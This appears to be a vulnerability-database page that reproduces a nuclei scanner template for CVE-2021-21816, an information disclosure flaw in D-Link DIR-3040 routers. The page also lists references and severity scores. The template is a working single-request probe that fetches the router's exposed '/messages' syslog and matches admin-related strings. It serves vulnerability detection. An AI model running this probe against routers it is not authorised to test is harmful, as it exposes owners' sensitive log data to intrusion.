Lucene search
K

D-Link DIR-3040 1.13B03 - Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

D-Link DIR-3040 1.13B03 - Information Disclosure in Syslog functionality, allowing unauthorized access to sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-21816
27 Apr 202309:58
circl
CNNVD
D-LINK DIR-3040 信息泄露漏洞
15 Jul 202100:00
cnnvd
CNVD
D-LINK DIR-3040 Information Disclosure Vulnerability (CNVD-2021-53338)
19 Jul 202100:00
cnvd
CVE
CVE-2021-21816
16 Jul 202110:28
cve
Cvelist
CVE-2021-21816
16 Jul 202110:28
cvelist
NVD
CVE-2021-21816
16 Jul 202111:15
nvd
OpenVAS
D-Link DIR-3040 < 1.13B03 Hotfix Multiple Vulnerabilities - Active Check
3 Aug 202100:00
openvas
OSV
CVE-2021-21816
16 Jul 202111:15
osv
Prion
Information disclosure
16 Jul 202111:15
prion
Positive Technologies
PT-2021-14792 · D Link · D-Link Dir-3040
16 Jul 202100:00
ptsecurity
Rows per page
id: CVE-2021-21816

info:
  name: D-Link DIR-3040 1.13B03 - Information Disclosure
  author: gy741
  severity: medium
  description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.
  remediation: |
    Upgrade the router firmware to the latest version provided by D-Link.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21816
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2021-21816
    cwe-id: CWE-200
    epss-score: 0.36486
    epss-percentile: 0.98299
    cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-3040_firmware
  tags: cve2021,cve,dlink,exposure,router,syslog,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "syslog:"
          - "admin"
          - "/etc_ro/lighttpd/www"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204a075778875b3243586f72e3c1a4ef5e3d0b05390b0cc5fb473a9ce3ac51a3de022073ab258bb1e6a535e5da92aa103e4ad7dd4a9ec039fcbec07124d369a3ca1d34:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.14.3
CVSS 24.3
CVSS 36.5
EPSS0.36486
32